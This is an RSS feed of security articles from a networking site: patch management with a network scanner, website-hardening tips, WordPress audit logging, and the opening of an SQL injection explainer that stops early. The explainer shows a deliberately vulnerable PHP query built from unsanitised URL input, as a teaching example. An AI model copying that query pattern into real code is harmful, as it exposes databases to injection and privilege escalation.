<?xml version="1.0" encoding="utf-8"?>
<!-- generator="" -->
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<title>Security Articles</title>
		<description><![CDATA[Leading Network Security & Cyber Security site. Cisco Routing/Switching, VPN, Microsoft, SASE, SSE, F5, PaloAlto Firewalls, Protocol Analysis, Tips & more.]]></description>
		<link>https://www.firewall.cx/tools-tips-reviews/security-articles.html</link>
		<lastBuildDate>Sat, 11 Apr 2026 12:46:53 +1000</lastBuildDate>
		<generator></generator>
		<atom:link rel="self" type="application/rss+xml" href="https://www.firewall.cx/tools-tips-reviews/security-articles.feed?type=rss"/>
		<language>en-gb</language>
		<item>
			<title>Continued: Protecting Enterprise &amp; SMB Networks From Exploits, Hacking &amp; Attacks - Automate System Patching Process - Part 2</title>
			<link>https://www.firewall.cx/tools-tips-reviews/security-articles/protecting-enterprise-smb-by-patching-systems-part-2.html</link>
			<guid isPermaLink="true">https://www.firewall.cx/tools-tips-reviews/security-articles/protecting-enterprise-smb-by-patching-systems-part-2.html</guid>
<description><![CDATA[<p style="text-align: justify;"><img src="https://www.firewall.cx/images/stories/protecting-enterprise-smb-by-patching-systems-part-2-1.png" alt="protecting-enterprise-smb-by-patching-systems-part-2-1" style="margin: 7px; float: left;" title="System Patching" />In our previous article <a href="https://www.firewall.cx/tools-tips-reviews/security-articles/protecting-enterprise-smb-by-patching-systems.html" target="_blank" title="Protecting Enterprise &amp; SMB Networks From Exploits, Hacking &amp; Attacks By Correctly Patching Systems">Protecting Enterprise &amp; SMB Networks From Exploits, Hacking &amp; Attacks By Correctly Patching Systems - Part 1</a>, we analysed the <strong>implications of unpatched systems</strong> and <strong>how hackers</strong> use these weaknesses to <strong>gain access to data and sensitive financial information</strong>. Included in the analysis were two major companies, eBay and the well-known P.F. Chang's chain of restaurants. We then provided some rules IT Departments, Managers and Administrators should follow in order to <strong>secure their systems at the best possible level</strong>.</p>
<p style="text-align: justify;">This article continues with a number of important tips to <strong>further enhance the security</strong> of your company systems and how tools can be used to <strong>scan</strong>, <strong>identify</strong>, <strong>patch and automate</strong> the whole process of <strong>protecting your systems</strong>.</p>
<h3 style="text-align: justify;">Tips To Enhance The System Security Patching Process (Continued)</h3>
<h2 style="text-align: justify;">Set Your Priorities</h2>
<p style="text-align: justify;">Not all computers in the organization need to be patched at the same time. Some computers are more likely to be attacked because they are Internet-facing. Systems handling e-commerce, such as point-of-sale machines and servers holding the customer database, are usually <strong>more vulnerable to attack</strong>. Therefore, <strong>prioritize the patching process</strong> so that the most critical systems are serviced before others are.</p>
<h2 style="text-align: justify;">Standardize Your Configurations</h2>
<p style="text-align: justify;">If you use many tools and software programs, you will need to track and install several patches. <strong>Standardizing your configuration</strong> allows all systems to use the same operating system and tools. That results in easier maintenance and tracking of patches and service pack levels. If possible, <strong>lock down the configuration</strong> - this can easily be achieved in a Windows environment with the usage of <a href="https://www.firewall.cx/operating-systems/microsoft/windows-servers/windows-2012-group-policies.html" target="_blank" title="Configuring Active Directory Group Policies">Active Directory Group Policies</a>. <a href="https://www.firewall.cx/operating-systems/microsoft/windows-servers/windows-2012-group-policy-enforcement.html" target="_blank" title="Enforcing Group Policies Active Directory Group Policies">Enforcing Group Policies</a> ensures users are not able to make any system configuration changes and all <a href="https://www.firewall.cx/operating-systems/microsoft/windows-servers/windows-2012-group-policy-enforcement.html" target="_blank" title="Enforcing Active Directory Group Policies">security policies are enforced</a> correctly.</p>
<h2 style="text-align: justify;">Plan Your Patches</h2>
<p style="text-align: justify;"><strong>Not all patches</strong> that the vendors release <strong>need to be installed</strong>. Actually, this depends on the criticality of the vulnerability that the patch fixes. If the patch fixes a <strong>critical vulnerability</strong> in a system that faces the <strong>maximum threat</strong>, <strong>install it immediately</strong>. For minor patches, the decision whether to install can be taken after an analysis of a what-if scenario in case the hole is left unpatched.</p>
<p style="text-align: justify;">Using an <strong>automated multi-platform patching tool is highly recommended</strong> - it installs all the important patches after testing them.</p>
<h2 style="text-align: justify;">Report Your Actions &amp; Analyze</h2>
<p style="text-align: justify;">Once you have installed the patches, the <strong>post-patch</strong> work begins. It starts with a report of what was installed and how many vulnerable systems were fixed. <strong>Acceptance testing comes next</strong>, to determine if the patch installation was done the right way and there are <strong>no conflicts</strong>.</p>
<p style="text-align: justify;">You must also test your system to see if the vulnerability has really been addressed. If the system still remains vulnerable, you may have to reinstall the patch or roll it back. A <strong>patch management tool</strong> makes the task simpler.</p>
<h2 style="text-align: justify;">Test Your Systems Seriously</h2>
<p style="text-align: justify;">Testing a patch for <strong>effectiveness and conflicts</strong> is <strong>very important</strong> in maintaining a running business process. A patch that trashes a stable system because of conflicts can do a lot of harm. You can use third parties for testing the patches before you install them. However, even if successfully tested by others, it is advisable to test the patch in-house before installation, especially if system uptime is important to your business.</p>
<p style="text-align: justify;">For in-house testing, <a href="https://www.firewall.cx/operating-systems/microsoft/windows-servers/windows-virtualization-hyper-v-concepts.html" target="_blank" title="Virtualization">virtualization</a> helps as it provides a contained arena isolated from your actual production systems. In case of a virtualized environment a <a href="https://clixtrac.com/goto/?180621" target="_blank" rel="nofollow noopener" title="reliable VM backup tool">reliable backup tool</a> is very important to ensure the <a href="https://clixtrac.com/goto/?180621" target="_blank" rel="nofollow noopener" title="Preventing Data Loss in Virtualization Environment">prevention of data loss</a>. You could also try out a controlled rollout on less critical systems to see how the patch functions before installing on the entire network.</p>
<h2 style="text-align: justify;">Patch Your Systems Continually</h2>
<p style="text-align: justify;">Your IT team cannot rest once it has patched the systems successfully. New vulnerabilities are discovered and the vendor releases further patches. Moreover, you may have deployed new tools. Therefore, the entire process of inventorying your assets, looking for patches and installing them is a continuous process, along with conducting a vulnerability assessment of your network.</p>
<h2 style="text-align: justify;">How An Automated Patch Management System Helps</h2>
<p style="text-align: justify;">In an organization, the IT team needs to manage and monitor all assets effectively, efficiently and with complete transparency. They must ensure that <strong>all assets of the company perform at their peak efficiency</strong> while remaining <strong>safeguarded from attacks on their vulnerabilities</strong>. When examining the internal security of a network, the IT team looks at the overall scenario for:</p>
<ul class="checkbox">
<li style="text-align: justify;">Any unauthorized machine on the network</li>
<li style="text-align: justify;">Any machine that does not have the required security patches installed</li>
<li style="text-align: justify;">Any machine that does not have the necessary security settings applied</li>
</ul>
<p style="text-align: justify;">An automated patch management system provides a consolidated platform for the IT team from where they can remotely manage the performance of the network and the software deployed while controlling the security of all the assets of the company.</p>
<h2 style="text-align: justify;">Scanning Your Network Internally</h2>
<p style="text-align: justify;"><img src="https://www.firewall.cx/images/stories/protecting-enterprise-smb-by-patching-systems-part-2-2.png" alt="protecting-enterprise-smb-by-patching-systems-part-2-2" style="margin: 7px; float: left;" title="GFI LanGuard Network Scanner" />LanGuard Network Security Scanner begins by scanning the entire network defined by a range of IP addresses. It is also possible to scan a list of computers or those under a specific domain. When scanning with null credentials, it generates a baseline scan giving you an idea of what any normal user would have access to. Apart from null credentials, you can set the scanning credentials to a specific user or to the currently logged on user. Scanning with full administrative access will provide complete details about any missing security patches and other vulnerabilities such as weak passwords used on shares.</p>
<p style="text-align: justify;">While scanning, LanGuard Network Security Scanner displays its results in two panes. On the left are the nodes it has discovered and on the right is the real-time log of its activities. Each node on the left can be expanded to show the information LanGuard Network Security Scanner has gathered. The easy-to-read display shows the sorted results of SNMP queries, NetBIOS queries, ping sweeps and port scans, with which LanGuard has probed each IP in the range. If the number of IPs to be scanned is high, LanGuard indicates the progress in the lower-right corner of the screen.</p>
<h2 style="text-align: justify;">Analyzing Your Results</h2>
<p style="text-align: justify;">After LanGuard has completed its scanning, you can analyze the results displayed. For a large list of IP addresses, the results are easier to read when you display them in a convenient report format. Choose from the several reporting options – you can also customize the report layout and content. You may also use the separate report generator tool.</p>
<p style="text-align: justify;">The LanGuard report highlights all the known vulnerabilities and provides links to resources related to each problem. It lists all open ports and mentions problems with the service that the port provides. By default, LanGuard scans only a few ports notorious for their vulnerabilities. However, you can manually add more ports that you want LanGuard to scan.</p>
<h2 style="text-align: justify;">Scanning Your Network Externally</h2>
<p style="text-align: justify;">You can also use LanGuard to scan your network externally from a PC connected to the Internet. Select your public IP range and scan your network with null credentials. LanGuard will scan the ports of any IP addresses that do not respond to other queries and will expose any open ports that the firewalls and routers in the path have not blocked. You can set up different scanning configurations for LanGuard and save them for later recall.</p>
<h2 style="text-align: justify;">Set Your Scanning Options</h2>
<p style="text-align: justify;">You need to adjust different settings when scanning LAN, WAN or MAN. The time to complete the scan depends on these settings. For example, with the <strong>Debug settings</strong>, you can control how much information LanGuard displays on its right pane; adjusting the settings in the SNMP section, you can control how LanGuard probes using SNMP.</p>
<p style="text-align: justify;">There may be computers on the network that essentially block NetBIOS, ICMP and SNMP packets. LanGuard tackles such non-responsive machines by scanning their ports, provided you have enabled this option. However, this increases the scan time greatly.</p>
<h2 style="text-align: justify;">Detect Missing Fixes &amp; Security Patches</h2>
<p style="text-align: justify;">To keep itself current on the missing patches, LanGuard uses an XML file, which you can automatically download from Microsoft's Web Site. If you are using the registered version of LanGuard, you can deploy the missing patches remotely.</p>
<h2 style="text-align: justify;">Document Your Activity</h2>
<p style="text-align: justify;">The registered version of LanGuard has a great tool for documenting your network. Configure it for a standard report output and list specific information about your network. Next time you scan, you can compare the reports to document the difference.</p>
<p style="text-align: justify;">The report generator is a separate tool within LanGuard. You can use it to query the XML report files and create a custom report, which is a combination of multiple queries.</p>
<h2 style="text-align: justify;">Summary</h2>
<p style="text-align: justify;">For any organization, the process of managing the inventory of assets, gathering information about vulnerabilities and then systematically patching them to protect from attacks, is a formidable task. Fortunately, automated tools for patch management make life easier for corporate IT teams. By automating much of the repetitive work, these tools allow IT to focus their expertise and knowledge where it benefits the company most – strengthening its cyber security.</p>]]></description>
			<category>Security Articles</category>
			<pubDate>Sun, 24 Aug 2014 06:25:03 +1000</pubDate>
		</item>
		<item>
			<title>7 Security Tips to Protect Your Websites &amp; Web Server From Hackers</title>
			<link>https://www.firewall.cx/tools-tips-reviews/security-articles/security-tips-how-to-protect-your-websites-and-webservers-from-hackers.html</link>
			<guid isPermaLink="true">https://www.firewall.cx/tools-tips-reviews/security-articles/security-tips-how-to-protect-your-websites-and-webservers-from-hackers.html</guid>
<description><![CDATA[<p style="text-align: justify;"><img src="https://www.firewall.cx/images/stories/web-application-security/best-practices-secure-web-apps/digital-eye.jpg" alt="digital eye" style="margin: 7px; float: left;" title="digital eye" />Recent and <strong>continuous website security breaches</strong> at <strong>large organizations</strong>, <strong>federal government agencies</strong>, <strong>banks</strong> and thousands of <strong>companies world-wide</strong> have once again confirmed the importance of website and web application security to <strong>prevent hackers</strong> from <strong>gaining access to sensitive data</strong> while <strong>keeping corporate websites as safe as possible</strong>. Many encounter a lot of problems when it comes to <strong>web application security</strong>; it is a pretty heavy field to dig into.</p>
<p style="text-align: justify;">Some security professionals would not be able to provide all the necessary steps and precautions to deter malicious users from abusing your web application. Many web developers will encounter some form of difficulty while attempting to secure their website, which is understandable since web application security is a multi-faceted concept, where an attacker could make use of <strong>thousands of different exploits</strong> that could be present on your website.</p>
<p style="text-align: justify;">Although no single list of web security tips and tricks can be considered as complete (in fact, one of the tips is that the amount of knowledge, information and precautions that you can implement is never enough), the following is as close as you can get. We have listed six concepts or practices to aid you in securing your website which, as we already mentioned, is anything but straightforward. These points will get you started and nudge you in the right direction, where some factors in web application security are considered to be higher priority to be secured than others.</p>
<h2 style="text-align: justify;">1. Hosting Options</h2>
<p style="text-align: justify;"><img src="https://www.firewall.cx/images/stories/web-application-security/best-practices-secure-web-apps/web-hosting.jpg" alt="web hosting" style="margin: 7px; float: left;" title="web hosting" />Without web hosting services most websites would not exist. The most popular methods to host web applications are: <strong>regular hosting</strong>, where your web application is hosted on a dedicated server that is intended for your website only, and <strong>shared hosting</strong>, where you share a web server with other users who will in turn run their own web application on the same server.</p>
<p style="text-align: justify;">There are multiple benefits to using shared hosting. Mainly this option is cheaper than having your own dedicated server which, therefore, generally attracts smaller companies preferring to share hosting space. The difference between shared and dedicated hosting will seem irrelevant when looking at this from a functionality point of view, since the website will still run, however, when discussing security we will need to look at it from a completely different perspective.</p>
<p style="text-align: justify;">The downside of shared hosting trumps any advantages that it may offer. Since the web server is being shared between multiple web applications, any attacks will also be shared between them. For example, if you share your web server with an organisation that has been targeted by attackers who have launched <strong>Denial of Service attacks</strong> on its website, your web application will also be affected since it is being hosted on the same server while using resources from the same resource pool. Meanwhile, the absence of complete control over the web server itself will allow the provider to take certain decisions that may place your web application at risk of being exploited. If one of the websites being hosted on the shared server is vulnerable, there is a chance that all the other websites and the web server itself could be exploited. Read more about web server security.</p>
<h2 style="text-align: justify;">2. Performing Code Reviews</h2>
<p style="text-align: justify;"><img src="https://www.firewall.cx/images/stories/web-application-security/best-practices-secure-web-apps/code-review-check.png" alt="code review check" style="margin: 7px; float: left;" title="code review check" />Most successful attacks against web applications are due to insecure code and not the underlying platform itself. Case in point, <a href="https://www.firewall.cx/security/web-application-vulnerability-scanners/how-sql-injection-attacks-work-examples.html" target="_blank" title="SQL Injection attacks"><span style="color: #1155cc;">SQL Injection attacks</span></a> are still the most common type of attack even though the vulnerability itself has been around for over 20 years. This vulnerability does not occur due to incorrect input handling by the database system itself, it is entirely related to the fact that input sanitization is not implemented by the developer, which leads to untrusted input being processed without any filtering.</p>
<p style="text-align: justify;">This approach only applies for injection attacks and, normally, inspecting code would not be this straightforward. If you are making use of a pre-built application, updating to the latest version would ensure that your web application does not contain insecure code, although if you are using custom built apps, an in depth code review by your development team will be required. Whichever application type you are using, securing your code is a critical step or else the very base of the web application will be flawed and therefore vulnerable.</p>
<h2 style="text-align: justify;">3. Keeping Software Up To Date</h2>
<p style="text-align: justify;"><img src="https://www.firewall.cx/images/stories/web-application-security/best-practices-secure-web-apps/software-update.png" alt="software update" style="margin: 7px; float: left;" title="software update" />When using software that has been developed by a third party, the best way to ensure that the code is secure would be to apply the latest updates. A simple web application will make use of numerous components that can lead to successful attacks if left unpatched. For example, both PHP and MySQL were vulnerable to exploits at a point in time but were later patched, and a default Linux webserver installation will include multiple services all of which need to be updated regularly to avoid vulnerable builds of software being exploited.</p>
<p style="text-align: justify;">The importance of updating can be seen from the <span style="color: #1155cc;">HEARTBLEED</span><strong> exploit</strong> discovered in OpenSSL, which is used by most web applications that serve their content via HTTPS. That being said, patching these vulnerabilities is an easy task once the appropriate patch has been released, you will simply need to update your software. This process will be different for every operating system or service although, just as an example to see how easy it is, updating services in Debian based servers will only require you to run a couple of commands.</p>
<h2 style="text-align: justify;">4. Defending From Unauthorised Intrusions</h2>
<p style="text-align: justify;"><img src="https://www.firewall.cx/images/stories/web-application-security/best-practices-secure-web-apps/defending-against-intrusions.png" alt="defending against intrusions" style="margin: 7px; float: left;" title="defending against intrusions" />While updating software will ensure that no known vulnerabilities are present on your system, there may still be entry points where an attacker can access your system that have been missed in our previous tips. This is where firewalls come into play. A firewall is necessary as it will limit traffic depending on your configuration and can also be found on most operating systems by default.</p>
<p style="text-align: justify;">That being said, a firewall will only be able to analyse network traffic, which is why implementing a Web Application Firewall is a must if you are hosting a web application. WAFs are best suited to identifying malicious requests that are being sent to a web server. If the WAF identifies an SQL Injection payload in a request it will drop that request before it reaches the web server. Meanwhile if a WAF is not able to intercept these requests, you may also set up custom rules depending on the requests that need to be blocked. If you are wondering which requests you can block even before your WAF can, take a look at our next tip.</p>
<h2 style="text-align: justify;">5. Performing Web Vulnerability Scans</h2>
<p style="text-align: justify;"><img src="https://www.firewall.cx/images/stories/web-application-security/best-practices-secure-web-apps/web-vulnerability-scans.png" alt="web vulnerability scans" style="margin: 7px; float: left;" title="web vulnerability scans" />No amount of code reviews and updates can ensure that the end product is not vulnerable and cannot be exploited. Code reviews are limited since the executed code is not being analysed, which is why web vulnerability scanning is essential. Web scanners will view the web application as a black box, where they will be analysing the finished product, which is not possible with white box scanning or code reviews. Meanwhile, some scanners will also provide you with the option to perform grey box scanning, by combining website scans and a backend agent that can analyse code.</p>
<p style="text-align: justify;">As complex and large as web applications are nowadays, it would be easy to miss certain vulnerabilities while performing a manual penetration test. Web vulnerability scanners will automate this process for you, thereby being able to cover a larger website in less time, while being able to detect most known <strong>vulnerabilities</strong>. One notorious vulnerability that is difficult to identify is <a href="https://www.firewall.cx/security/web-application-vulnerability-scanners/protecting-user-cookies-from-xss-vulnerabilities-attacks.html" target="_blank" title="DOM-based XSS"><span style="color: #1155cc;">DOM-based XSS</span></a>, although web scanners are still able to identify such vulnerabilities. Web vulnerability scanners will also provide you with requests that you need to block on your <strong>Web Application Firewall</strong> (<strong>WAF</strong>), while you are working to fix these vulnerabilities.</p>
<h2 style="text-align: justify;">6. Importance Of Monitoring</h2>
<p style="text-align: justify;"><img src="https://www.firewall.cx/images/stories/web-application-security/best-practices-secure-web-apps/application-monitoring-alerts.png" alt="application monitoring alerts" style="margin: 7px; float: left;" title="application monitoring alerts" />It is imperative to know if your web application has been subjected to an attack. <strong>Monitoring the web application</strong>, and the <strong>server hosting it</strong>, would be the best way to ensure that even if an attacker gets past your defence systems, at least you will know how, when and from where it happened. There may be cases when a website is brought offline due to an attack and the owner would not even know about the incident but will find out after precious time has passed.</p>
<p style="text-align: justify;">To avoid this you can <strong>monitor server logs</strong>, for example <strong>enabling notifications</strong> to be triggered when a file is deleted or modified. This way, if you had not modified that particular file, you will know that someone else has unauthorised access to your server. You can also monitor uptime which comes in handy when the attack is not as stealthy as modifying files, such as when your web server is subject to a <strong>Denial of Service attack</strong>. Such utilities will notify you as soon as your website is down, without having to discover the incident from users of your website.</p>
<p style="text-align: justify;">The worst thing you can do when implementing monitoring services would be to base them on the same web server that is to be monitored. If this server was knocked down, the monitoring service will not be available to notify you.</p>
<h2 style="text-align: justify;">7. Never Stop Learning</h2>
<p style="text-align: justify;">Finally, whatever you currently know about web security it’s never enough. Never stop learning about improving your <strong>web application’s security</strong> because literally every day brings a new exploit that may be used against your website. <strong>Zero day attacks</strong> happen out of the blue, which is why keeping yourself updated with any new security measures that you can implement is imperative. You can find such information from multiple web security blogs that detail how a website administrator should enforce their <strong>website’s security</strong>.</p>]]></description>
			<category>Security Articles</category>
			<pubDate>Mon, 15 Jun 2015 02:31:33 +1000</pubDate>
		</item>
		<item>
			<title>WordPress Audit Trail: Monitor Changes &amp; Security Alerts For WordPress Blogs, Websites, e-Shops - Regulatory Compliance</title>
			<link>https://www.firewall.cx/tools-tips-reviews/security-articles/wordpress-audit-monitor-log-site-security-alerts.html</link>
			<guid isPermaLink="true">https://www.firewall.cx/tools-tips-reviews/security-articles/wordpress-audit-monitor-log-site-security-alerts.html</guid>
			<description><![CDATA[<p style="text-align: justify;"><strong><img src="https://www.firewall.cx/images/stories/wordpress-audit-trail-log-site-security-alerts-1a.png" alt="wordpress-audit-trail-log-site-security-alerts-1a" style="margin: 7px; float: left;" title="Monitor Changes &amp; Security Alerts For WordPress Blogs, Websites, e-Shops " />Monitoring</strong>, <strong>Auditing</strong> and obtaining <strong>Security Alerts</strong> for <strong>websites</strong> and <strong>blogs</strong> based on popular <strong>CMS systems</strong> such as <strong>WordPress</strong>, has become a necessity. <strong>Bugs</strong>, <strong>security exploits</strong> and <strong>security holes</strong> are being continuously discovered for every <strong>WordPress version</strong> making <strong>monitoring and auditing</strong> a <strong>high security priority</strong>. In addition, <strong>multi-user environments</strong> are often used for large <strong>WordPress websites</strong>, making it equally important to <strong>monitor WordPress user activity</strong>.</p>
<p style="text-align: justify;">Users with different privileges can login to the website’s admin pages and publish content, install a plugin to add new functionality to the website, or change a WordPress theme to change the look and feel of the website. From the admin pages of WordPress users can do anything, including taking down the website for maintenance, depending on their privileges.</p>
<h2 style="text-align: left;"><span style="font-weight: normal; font-style: normal;">The Need to Keep a Log of What is Happening on Your WordPress</span></h2>
<p style="text-align: justify;">Every type of multi-user software keeps an audit trail that records all user activity on the system. And, since modern business websites have become full-blown multi-user web applications, keeping a WordPress audit trail is a critical, must-do task. A default installation of WordPress does not have an audit trail, but the good news is that there are plugins such as WP Security Audit Log that allow you to keep an audit trail of everything that is happening on your WordPress.</p>
<p style="text-align: center;" align="center"><a href="https://www.firewall.cx/images/stories/wordpress-audit-trail-log-site-security-alerts-1b.png" target="_blank" title="Plugins like WP Security Audit Log provide detailed tracking of all necessary events"><strong><img src="https://www.firewall.cx/images/stories/wordpress-audit-trail-log-site-security-alerts-1.png" alt="wordpress-audit-trail-log-site-security-alerts-1" style="display: block; margin-left: auto; margin-right: auto;" title="Plugins like WP Security Audit Log provide detailed tracking of all necessary events" /></strong></a><span style="font-size: 9pt; line-height: 115%;">Figure 1. Plugins like WP Security Audit Log provide detailed tracking of all necessary events (click to enlarge)</span></p>
<p style="text-align: justify;">There are several advantages to keeping track of all the changes that take place on your WordPress website in an audit trail. Here are just a few:</p>
<h2 style="text-align: left;"><span style="font-weight: normal; font-style: normal;">Keep Track Of Content &amp; Functionality Changes On Your WordPress</span></h2>
<p style="text-align: justify;">By keeping a WordPress audit trail you can find out who did what on your WordPress website. For example; who published an article, or modified existing and already published content of an article or a page, installed a plugin, changed the theme or modified the source code of a file.</p>
<p align="center">&nbsp;<a href="https://www.firewall.cx/images/stories/wordpress-audit-trail-log-site-security-alerts-2b.png" target="_blank" title="Searching for specific events in WordPress Security Audit Log"><img src="https://www.firewall.cx/images/stories/wordpress-audit-trail-log-site-security-alerts-2.png" alt="Searching for specific events in WordPress Security Audit Log" title="Searching for specific events in WordPress Security Audit Log" /></a></p>
<p align="center">Figure 2. Searching for specific events in WordPress Security Audit Log (click to enlarge)</p>
<h2 style="text-align: left;"><span style="font-weight: normal; font-style: normal;">Be Alerted to Suspicious Activity on Your WordPress</span></h2>
<p style="text-align: justify;">By keeping a WordPress audit trail you can also be alerted to suspicious activity on your WordPress site at an early stage, thus thwarting possible attacks. For example, when a WordPress site is compromised, the attackers typically reset a user’s password or create a new account to log in to WordPress. By using an add-on such as Email Notifications you can create specific rules so that when important changes happen on your WordPress site they are logged and you are notified via email.</p>
<p style="text-align: center;" align="center"><img src="https://www.firewall.cx/images/stories/wordpress-audit-trail-log-site-security-alerts-3.png" alt="wordpress-audit-trail-log-site-security-alerts-3" style="display: block; margin-left: auto; margin-right: auto;" title=" WP Security Audit Log: Creating customized email alerts for your WordPress site " /><span style="font-size: 9pt; line-height: 115%;"> Figure 3. WP Security Audit Log: Creating customized email alerts for your WordPress site </span></p>
<h2 style="text-align: left;"><span style="font-weight: normal; font-style: normal;">Ensure the Productivity of Your Users &amp; Employees</span></h2>
<p style="text-align: justify;">Nowadays many businesses employ remote workers. As much as businesses benefit from employing remote workers, there are disadvantages. For example, while the activity of employees who work from the office can easily be tracked, that of remote workers cannot. If your business website is powered by WordPress, installing a WordPress audit trail plugin lets you keep track of everything your web team is doing on the website, including login and logout times and location.</p>
<h2 style="text-align: left;"><span style="font-weight: normal; font-style: normal;">Ensure Your Business WordPress Websites Meet Mandatory Regulatory Compliance Requirements </span></h2>
<p style="text-align: justify;">If you run an online business, or conduct any sort of business via your WordPress website, there are a number of regulatory compliance requirements your website needs to adhere to, such as PCI DSS. One requirement these compliance standards have in common is logging. As a website owner you should keep a log, or audit trail, of all the activity that takes place on your website.</p>
<h2 style="text-align: left;"><span style="font-weight: normal; font-style: normal;">Ease WordPress Troubleshooting </span></h2>
<p style="text-align: justify;">If you already have experience managing a multi-user system, you know that when something breaks users will never tell you what they did. This is common, especially when administering customers’ websites: the customer has administrative access to WordPress, someone installs a plugin, the website goes haywire, yet it is no one’s fault. By keeping a WordPress audit trail you can refer to it and easily track any website changes that took place, making troubleshooting much easier.</p>
<h2 style="text-align: left;"><span style="font-weight: normal; font-style: normal;">Keep A WordPress Audit Trail</span></h2>
<p style="text-align: justify;">There are several other <strong>advantages</strong> when you <strong>keep a WordPress audit trail to keep a record of all the changes</strong> that take place on your <strong>WordPress</strong> site, such as having the ability to generate reports to justify your charges. The list of advantages can be endless but the most important one is <strong>security</strong>. Typically overlooked, <strong>logging</strong> also helps you ensure the <strong>long term security</strong> of your <strong>WordPress website</strong>. </p>
<p style="text-align: right;" align="right">&nbsp;</p>]]></description>
			<category>Security Articles</category>
			<pubDate>Wed, 06 Apr 2016 22:57:57 +1000</pubDate>
		</item>
		<item>
			<title>Understanding SQL Injection Attacks &amp; How They Work. Identify SQL Injection Code &amp; PHP Caveats</title>
			<link>https://www.firewall.cx/tools-tips-reviews/security-articles/understanding-sql-injection-attacks-how-they-work-and-protecting-webservers.html</link>
			<guid isPermaLink="true">https://www.firewall.cx/tools-tips-reviews/security-articles/understanding-sql-injection-attacks-how-they-work-and-protecting-webservers.html</guid>
			<description><![CDATA[<p style="text-align: justify;"><strong><img src="https://www.firewall.cx/images/stories/Introduction-to-SQL-Injection-01.png" alt="Introduction-to-SQL-Injection-01" style="margin: 7px; float: left;" title="Understand &amp; Protect from SQL Injections – SQL Injection code examples" />SQL Injections</strong> have been keeping <strong>security experts</strong> busy for over a decade now as they continue to be one of the <strong>most common types</strong> of <strong>attacks against webservers, websites</strong> and <strong>web application servers</strong>. In this article, we explain <strong>what a SQL injection is</strong>, show you <strong>SQL injection examples</strong> and analyse how these types of attacks manage to <strong>exploit web applications and webservers</strong>, providing hackers with <strong>access to sensitive data</strong>.</p>
<div style="text-align: justify;">Additional interesting <strong>Web Hacking</strong> and <strong>Web Security content</strong>:</div>
<ul class="checkbox">
<li>
<div><a href="https://www.firewall.cx/tools-tips-reviews/security-articles/security-tips-how-to-protect-your-websites-and-webservers-from-hackers.html" target="_blank" title="Protect Your Websites &amp; Web Server From Hackers">7 Security Tips to Protect Your Websites &amp; Web Server From Hackers</a></div>
</li>
<li>
<div><a href="https://www.firewall.cx/tools-tips-reviews/security-articles/automation-web-application-security-testing.html" target="_blank" title="Importance of Automating Web Application Security Testing &amp; Penetration Testing">The Importance of Automating Web Application Security Testing &amp; Penetration Testing</a></div>
</li>
<li>
<div><a href="https://www.firewall.cx/tools-tips-reviews/security-articles/implications-of-unsecure-webservers-and-websites-for-oganizations-companies.html" target="_blank" title="Implications of Unsecure Webservers &amp; Websites for Organizations &amp; Businesses">The Implications of Unsecure Webservers &amp; Websites for Organizations &amp; Businesses</a></div>
</li>
<li>
<div><a href="https://www.firewall.cx/tools-tips-reviews/security-articles/netsparker-discovery-wordpress-dom-xss-scripting-vulnerability.html" target="_blank" title="WordPress DOM XSS Cross-site Scripting Vulnerability Identified By Netsparker">WordPress DOM XSS Cross-site Scripting Vulnerability Identified By Netsparker</a></div>
</li>
<li>
<div><a href="https://www.firewall.cx/tools-tips-reviews/security-articles/choosing-web-application-security-scanner.html" target="_blank" title="Choosing a Web Application Security Scanner - The Importance of Using the Right Security Tools">Choosing a Web Application Security Scanner - The Importance of Using the Right Security Tools</a></div>
</li>
</ul>
<h2 style="text-align: justify;">What Is A SQL Injection?</h2>
<p style="text-align: justify;">Websites typically have two sides to them: the <strong>frontend</strong> and the <strong>backend</strong>. <strong>The frontend</strong> is the element we see: the rendered HTML, images, and so forth. On the <strong>backend</strong>, however, there are layers upon layers of systems producing the elements for the frontend. One such layer, the database, most commonly uses a database language called <strong>SQL</strong>, or <strong><em>Structured Query Language</em></strong>. This standardized language provides a logical, human-readable sentence that performs definition, manipulation, or control instructions on relational data held in tabular form. The problem is that, while this structure provides human readability, it also opens up a major security problem.</p>
<div style="text-align: justify;">Typically, when data is provided from the frontend to the backend of a website (e.g. an HTML form with username and password fields), this data is inserted into the sentence of a SQL query. Rather than being assigned to some object or passed through a <em>set()</em> function, the data is concatenated into the middle of a string, much as you would concatenate a variable’s value into a line of debug text before printing it. The problem is that the database server, such as MySQL or PostgreSQL, must lexically analyse the sentence, understand its grammar and parse the <em>variable=value</em> definitions, so it imposes specific syntactic requirements, such as wrapping string values in quotes. A SQL injection vulnerability, therefore, is one where unsanitized frontend data, such as quotation marks, can disrupt the intended sentence of a SQL query.</div>
<h2 style="text-align: justify;">How Does A SQL Injection Work?</h2>
<p style="text-align: justify;">So what does “disrupt the intended sentence of a SQL query” mean? A SQL query reads like an English sentence:</p>
<p style="text-align: justify;"><em>Take variable foo and set it to <strong>‘bar’</strong> in table <strong>foobar</strong>.</em><br />Notice the single-quotes around the intended value, <em><strong>bar</strong></em>. But if we take that value, add a single quote and some additional text, we can <em>disrupt the intended sentence,</em> creating two sentences that change the entire effect. So long as the database server can lexically understand the sentence, it is none the wiser and will happily complete its task.&nbsp; So what would this look like?</p>
<p style="text-align: justify;">If we take that value <em><strong>bar</strong></em> and change it to something more complex – <em><strong>bar’</strong></em> <em>in table <strong>foobar</strong></em>. <strong>Delete all values not equal to ‘</strong> – it completely disrupts everything. The sentence is thus changed as follows:</p>
<p style="text-align: justify;"><em>Take variable <strong>foo</strong> and set it to<span style="color: #ff0000;"> <strong>‘bar’</strong> in table <strong>foobar</strong>. Delete all values not equal to ‘’</span> in table <strong>foobar</strong>.</em></p>
<p style="text-align: justify;">Notice how dramatically this disrupts the intended sentence? By<em> injecting</em> additional information, including syntax, into the sentence, the entire intended function and result has been disrupted to effectively delete everything in the table, rather than just change a value.</p>
<h2 style="text-align: justify;">What Does A SQL Injection Look Like?</h2>
<p style="text-align: justify;">In code form, a SQL injection can occur in effectively any place where a SQL query can be altered by the user of a web application. This includes query strings (e.g. <em>example.com/?this=query_string</em>), form content (such as a comments section on a blog, or even the username &amp; password input fields on a login page), cookie values, HTTP headers (e.g. X-FORWARDED-FOR), and practically anything else. For this example, consider a simple query string in PHP:</p>
<p class="box-info" style="text-align: justify;"><strong>Request URI: /?username=admin</strong><br />&nbsp;<br />1.&nbsp; $user = $_GET['username'];<br />2.&nbsp; mysql_query("UPDATE tbl_users SET admin=1 WHERE username='$user'");</p>
<p style="text-align: justify;">First, we will break this down a bit.</p>
